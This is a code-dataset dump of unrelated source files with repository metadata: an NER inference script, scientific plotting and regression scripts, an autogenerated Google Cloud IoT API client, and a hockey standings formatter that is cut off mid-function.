i += 1
if tag == 0:
item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
elif (tag % 3) == 1:
entity_name += char
entity_start = idx
elif (tag % 3) == 2:
type_index = (tag-1) // 3
if (entity_name != "") and (i == last):
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name += char
elif (tag % 3)+3 == 3: # or i == len(zipped)
type_index = (tag-1) // 3
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name = ""
entity_start = idx
idx += 1
return item
def remove(text):
cleanr = re.compile(r"[ !#\$%&'\(\)*\+,-./:;<=>?@\^_`{|}~“”?!【】()、’‘…¥·]*")
cleantext = re.sub(cleanr, '', text)
return cleantext
def main(out_file='output/result.json',
model_config='config/rnn_config.json'):
"""Test model for given test set on 1 GPU or CPU.
Args:
in_file: file to be tested
out_file: output file
model_config: config file
"""
# 0. Load config
with open(model_config) as fin:
config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
if torch.cuda.is_available():
device = torch.device('cuda')
# device = torch.device('cpu')
else:
device = torch.device('cpu')
#0. preprocess file
# id_list = []
# with open(in_file, 'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# id = sents['id']
# id_list.append(id)
# id_dict = dict(zip(range(len(id_list)), id_list))
# 1. Load data
data = Data(vocab_file=os.path.join(config.model_path, 'vocab.txt'),
max_seq_len=config.max_seq_len,
model_type=config.model_type, config=config)
test_set, sc_list, label_list = data.load_file(config.test_file_path, train=False)
token_list = []
for line in sc_list:
tokens = data.tokenizer.convert_ids_to_tokens(line)
token_list.append(tokens)
data_loader_test = DataLoader(
test_set, batch_size=config.batch_size, shuffle=False)
# 2. Load model
model = MODEL_MAP[config.model_type](config)
model = load_torch_model(
model, model_path=os.path.join(config.model_path, 'model.bin'))
model.to(device)
# 3. Evaluate
answer_list, length_list = evaluate(model, data_loader_test, device, isTest=True)
def flatten(ll):
return list(itertools.chain(*ll))
# train_answers = handy_tool(label_list, length_list) #gold
# #answer_list = handy_tool(answer_list, length_list) #prediction
# train_answers = flatten(train_answers)
# train_predictions = flatten(answer_list)
#
# train_acc, train_f1 = calculate_accuracy_f1(
# train_answers, train_predictions)
# print(train_acc, train_f1)
test_json = json.load(open(config.test_file_path, 'r', encoding='utf-8'))
id_list = [item['id'] for item in test_json]
mod_tokens_list = handy_tool(token_list, length_list)
result = [result_to_json(t, s) for t,s in zip(mod_tokens_list, answer_list)]
# 4. Write answers to file
with open(out_file, 'w', encoding='utf8') as fout:
result_list = []
for id, item in zip(id_list,result):
entities = item['entities']
words = [d['word']+"-"+d['type'] for d in entities if d['type'] !='s']
unique_words = []
for w in words:
if w not in unique_words:
unique_words.append(w)
item = {}
item['id'] = id
item['entities'] = unique_words
result_list.append(item)
json.dump(result_list,fout,ensure_ascii=False, indent=4)
#fout.write(" ".join(words) + "\n")
# para_list = pd.read_csv(temp_file)['para'].to_list()
# summary_dict = dict(zip(id_dict.values(), [""] * len(id_dict)))
#
# result = zip(para_list, token_list)
# for id, summary in result:
# summary_dict[id_dict[id]] += remove(summary).replace(" ","")
#
# with open(out_file, 'w', encoding='utf8') as fout:
# for id, sumamry in summary_dict.items():
# fout.write(json.dumps({'id':id,'summary':sumamry}, ensure_ascii=False) + '\n')
if __name__ == '__main__':
fire.Fire(main)
| [
"[email protected]"
] | |
d7d3b5dd82cf367f319361397028ffae52993332 | 29903a2ef2dce59ecf1c680bb7096cbe5f36a43f | /BL_plot.py | 7a7ccb5918c8513bdc0801e001a99585ce4b95a4 | [] | no_license | mkindree/Python_Code | 1af4e5e05166f3ba55052330983ef08103e30b91 | 6ae03b570085bb8c1b73fbe226806fa6914a0f38 | refs/heads/master | 2021-03-30T20:46:48.128659 | 2018-03-13T18:26:24 | 2018-03-13T18:26:24 | 125,081,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,811 | py | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
#%%
# These options make the figure text match the default LaTex font
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})
#%% Boundary Layer data from spreadsheet
y = np.array([0.57, 0.60, 0.70, 0.80, 0.90, 1.00, 1.10, 1.20, 1.30, 1.40, 1.50,
1.70, 1.90, 2.10, 2.30, 2.50, 2.70, 2.90, 3.10, 3.30, 3.50, 4.50])
delta = 2.67
U = np.array([5.1378, 5.4314, 6.1356, 6.8619, 7.4792, 8.1326, 8.6573, 9.2868,
10.0035, 10.4333, 11.2046, 12.0477, 12.9027, 13.1515, 13.6101,
13.7471, 13.8719, 13.9032, 13.9653, 13.9828, 13.9917, 14.0058])
U_rms = np.array([0.409, 0.4041, 0.3921, 0.4099, 0.3921, 0.4301, 0.4502, 0.4146,
0.4393, 0.3442, 0.4229, 0.3521, 0.2876, 0.26, 0.1927, 0.1878,
0.1731, 0.1756, 0.1641, 0.1603, 0.164, 0.1644])
U_inf = 14.01
eta = np.array([0, 0.2, 0.4, 0.6, 0.8, 1, 1.2, 1.4, 1.6, 1.8, 2, 2.2, 2.4, 2.6,
2.8, 3, 3.2, 3.4, 3.6, 3.8, 4, 4.2, 4.4, 4.6, 4.8, 5])
eta_delta = 4.9
f_prime = np.array([0, 0.06641, 0.13277, 0.19894, 0.26471, 0.32979, 0.39378,
0.45627, 0.51676, 0.57477, 0.62977, 0.68132, 0.72899,
0.77246, 0.81152, 0.84605, 0.87609, 0.90177, 0.92333,
0.94112, 0.95552, 0.96696, 0.97587, 0.98269, 0.98779,
0.99155])
#%% Boundary Layer figure
PUBdir = r'D:\EXF Paper\EXF Paper V3\figs'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.eps'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
ax1.plot(eta/eta_delta, f_prime, 'k')
ax2 = ax1.twinx()
ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
xy1 = (0, 0.9)
xytext1 = (0.4, 0.9)
ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
arrowprops=dict(facecolor='k', edgecolor='k'))
ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
color='b', rotation='horizontal', labelpad=14)
ax2.tick_params('y', colors='b')
xy2 = (1.75, 0.6)
xytext2 = (0.9, 0.6)
ax1.annotate('', xy=xy2, xytext=xytext2,
arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
#%%
PUBdir = r'D:\NOVA Interview'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.png'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.plot(eta/eta_delta, f_prime, 'b', zorder=0)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
plt.legend(['Blasius profile', 'LDV measurements'])
#ax2 = ax1.twinx()
#ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
#xy1 = (0, 0.9)
#xytext1 = (0.4, 0.9)
#ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
# arrowprops=dict(facecolor='k', edgecolor='k'))
#ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
# color='b', rotation='horizontal', labelpad=14)
#ax2.tick_params('y', colors='b')
#xy2 = (1.75, 0.6)
#xytext2 = (0.9, 0.6)
#ax1.annotate('', xy=xy2, xytext=xytext2,
# arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
| [
"[email protected]"
] | |
a75cf2c5ccb67a5597a9c6f2f53b6994acad99ad | 29db1aec3519a22f01ef01a9eac783f0609dae4c | /Maximumposterior.py | dd480e3c77425e2f40fbfc99b846d6f87bd74f80 | [] | no_license | anirudhjack/Machine-Learning | 7ebefc52cd2326c8736fc2cb0d76ae1a7f8bde37 | c4f58a08826cb35b51ce9b0f246b6379494e64a3 | refs/heads/master | 2020-05-01T11:45:31.510779 | 2019-03-24T18:24:59 | 2019-03-24T18:24:59 | 177,450,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | import numpy as np
print(" Enter the No of training samples")
N=int(input())
x_g=np.linspace(0,2*np.pi,N)
y=np.sin(x_g)
mean=0
std=0.05
y+=np.random.normal(mean,std,N)
import matplotlib.pyplot as plt
#creating x-matrix using vstack function i.e arrange the data row wise
x=np.vstack((np.ones(N),x_g))
print("Enter the dimension:")
p=int(input())
print("Enter the value of alpha:")
alpha=float(input())
print("Enter the value of beta:")
beta=float(input())
lam=alpha/beta
print("Maximum posterior regularized lagrange multiplier:")
print(lam)
#loop for x with dimension "d"
for i in range(2,p):
x= np.vstack((x,np.power(x_g, i)))
x_p=x
#transpose of x-matrix
x=np.transpose(x)
#calculating the weight matrix
from numpy.linalg import inv
w=np.linalg.inv(x_p@x+lam*np.identity(p))@x_p@y
print("Maximum posterior weight matrix:")
print(w)
| [
"[email protected]"
] | |
fb94fc1597debf5a7a51e313349f8349d6bfb26d | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi | cc46a5a2b0b4513b177439dd5c53dfa3f3058b1e | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi | [
"[email protected]"
] | |
e1a70889e373ca860d381781148acddcf9e13a57 | d1ddb9e9e75d42986eba239550364cff3d8f5203 | /google-cloud-sdk/lib/googlecloudsdk/third_party/apis/cloudiot/v1beta1/cloudiot_v1beta1_client.py | b2ff82c30ed6816f1ea9058a0ee4fe9536f38a48 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | bopopescu/searchparty | 8ecd702af0d610a7ad3a8df9c4d448f76f46c450 | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | refs/heads/master | 2022-11-19T14:44:55.421926 | 2017-07-28T14:55:43 | 2017-07-28T14:55:43 | 282,495,798 | 0 | 0 | Apache-2.0 | 2020-07-25T17:48:53 | 2020-07-25T17:48:52 | null | UTF-8 | Python | false | false | 21,034 | py | """Generated client library for cloudiot version v1beta1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.cloudiot.v1beta1 import cloudiot_v1beta1_messages as messages
class CloudiotV1beta1(base_api.BaseApiClient):
"""Generated client library for service cloudiot version v1beta1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://cloudiot.googleapis.com/'
_PACKAGE = u'cloudiot'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/cloudiot']
_VERSION = u'v1beta1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'CloudiotV1beta1'
_URL_VERSION = u'v1beta1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new cloudiot handle."""
url = url or self.BASE_URL
super(CloudiotV1beta1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.projects_locations_registries_devices_configVersions = self.ProjectsLocationsRegistriesDevicesConfigVersionsService(self)
self.projects_locations_registries_devices = self.ProjectsLocationsRegistriesDevicesService(self)
self.projects_locations_registries = self.ProjectsLocationsRegistriesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsLocationsRegistriesDevicesConfigVersionsService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices_configVersions resource."""
_NAME = u'projects_locations_registries_devices_configVersions'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesConfigVersionsService, self).__init__(client)
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Lists the last few versions of the device configuration in descending.
order (i.e.: newest first).
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceConfigVersionsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}/configVersions',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.configVersions.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'numVersions'],
relative_path=u'v1beta1/{+name}/configVersions',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest',
response_type_name=u'ListDeviceConfigVersionsResponse',
supports_download=False,
)
class ProjectsLocationsRegistriesDevicesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices resource."""
_NAME = u'projects_locations_registries_devices'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/devices',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesCreateRequest',
response_type_name=u'Device',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.devices.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets details about a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesGetRequest',
response_type_name=u'Device',
supports_download=False,
)
def List(self, request, global_params=None):
"""List devices in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDevicesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'deviceIds', u'deviceNumIds', u'fieldMask', u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/devices',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesListRequest',
response_type_name=u'ListDevicesResponse',
supports_download=False,
)
def ModifyCloudToDeviceConfig(self, request, global_params=None):
"""Modifies the configuration for the device, which is eventually sent from.
the Cloud IoT servers. Returns the modified configuration version and its
meta-data.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceConfig) The response message.
"""
config = self.GetMethodConfig('ModifyCloudToDeviceConfig')
return self._RunMethod(
config, request, global_params=global_params)
ModifyCloudToDeviceConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}:modifyCloudToDeviceConfig',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.modifyCloudToDeviceConfig',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}:modifyCloudToDeviceConfig',
request_field=u'modifyCloudToDeviceConfigRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest',
response_type_name=u'DeviceConfig',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.devices.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesPatchRequest',
response_type_name=u'Device',
supports_download=False,
)
class ProjectsLocationsRegistriesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries resource."""
_NAME = u'projects_locations_registries'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device registry that contains devices.
Args:
request: (CloudiotProjectsLocationsRegistriesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/registries',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesCreateRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
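    # Illustrative sketch only (the service attribute and registry fields are
    # assumptions; the request/response types are taken from the config above):
    #
    #   request = CloudiotProjectsLocationsRegistriesCreateRequest(
    #       parent='projects/p/locations/l',
    #       deviceRegistry=DeviceRegistry(...))
    #   registry = client.projects_locations_registries.Create(request)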
def Delete(self, request, global_params=None):
"""Deletes a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def GetIamPolicy(self, request, global_params=None):
"""Gets the access control policy for a resource.
Returns an empty policy if the resource exists and does not have a policy
set.
Args:
request: (CloudiotProjectsLocationsRegistriesGetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('GetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:getIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.getIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:getIamPolicy',
request_field=u'getIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
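    # Illustrative sketch only (attribute and message names are assumptions):
    #
    #   request = CloudiotProjectsLocationsRegistriesGetIamPolicyRequest(
    #       resource='projects/p/locations/l/registries/r',
    #       getIamPolicyRequest=GetIamPolicyRequest())
    #   policy = client.projects_locations_registries.GetIamPolicy(request)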
def List(self, request, global_params=None):
"""Lists device registries.
Args:
request: (CloudiotProjectsLocationsRegistriesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceRegistriesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/registries',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesListRequest',
response_type_name=u'ListDeviceRegistriesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesPatchRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def SetIamPolicy(self, request, global_params=None):
"""Sets the access control policy on the specified resource. Replaces any.
existing policy.
Args:
request: (CloudiotProjectsLocationsRegistriesSetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('SetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:setIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.setIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:setIamPolicy',
request_field=u'setIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesSetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
If the resource does not exist, this will return an empty set of
permissions, not a NOT_FOUND error.
Args:
request: (CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestIamPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:testIamPermissions',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.testIamPermissions',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:testIamPermissions',
request_field=u'testIamPermissionsRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest',
response_type_name=u'TestIamPermissionsResponse',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = u'projects_locations'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
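# Illustrative sketch only: the generated services above are normally reached
# as attributes of a single client instance. The attribute names are
# assumptions derived from each service's _NAME value, and the response field
# names are likewise assumptions not shown in this excerpt:
#
#   client = CloudiotV1beta1()
#   response = client.projects_locations_registries.List(
#       CloudiotProjectsLocationsRegistriesListRequest(parent='projects/p/locations/l'))
#   for registry in response.deviceRegistries:
#       ...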
| [
"[email protected]"
] | |
adce83a22777b2ebe8fe30f555671f0d10599045 | 580a43c9bc8cc5cd5db745155e0721b5ba1664f6 | /S3-Notifications-Lambda/output.py | 8df38b8094739a3b3654a3327667dd092c71eb2e | [
"Apache-2.0"
] | permissive | Jardo72/AWS-Sandbox | e10e750a955701cb341b4133544f9e081378f37f | b0402295e9097027c12b1954df967a0ac4d5163d | refs/heads/master | 2023-07-08T21:02:30.360536 | 2023-06-30T09:07:23 | 2023-06-30T09:07:23 | 216,329,685 | 1 | 1 | Apache-2.0 | 2023-05-23T04:57:47 | 2019-10-20T08:21:58 | HCL | UTF-8 | Python | false | false | 1,983 | py | #
# Copyright 2021 Jaroslav Chmurny
#
# This file is part of AWS Sandbox.
#
# AWS Sandbox is free software developed for educational purposes. It
# is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicationlicationlicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Sequence
from model import StandingsEntry
def _column_headings() -> str:
return ' GP RW OW OL RL GF:GA PTS\n'
def _standings_entries(entries: Sequence[StandingsEntry]) -> str:
result = ''
for index, single_entry in enumerate(entries):
rank = index + 1
result += f'{rank:2}.{single_entry.team} '
result += f'{single_entry.overall_game_count:2d} '
result += f'{single_entry.regulation_win_count:2d} '
result += f'{single_entry.overtime_win_count:2d} '
result += f'{single_entry.overtime_loss_count:2d} '
result += f'{single_entry.regulation_loss_count:2d} '
result += f'{single_entry.goals_for:2d}:'
result += f'{single_entry.goals_against:2d} '
result += f'{single_entry.points:3d}\n'
return result
def _legend() -> str:
return """
Legend
GP .... Games Played
RW .... Regulation Wins
OW .... Overtime + Shootout Wins
OL .... Overtime + Shootout Losses
RL .... Regulation Losses
GF .... Goals For
 GA .... Goals Against
PTS ... Points
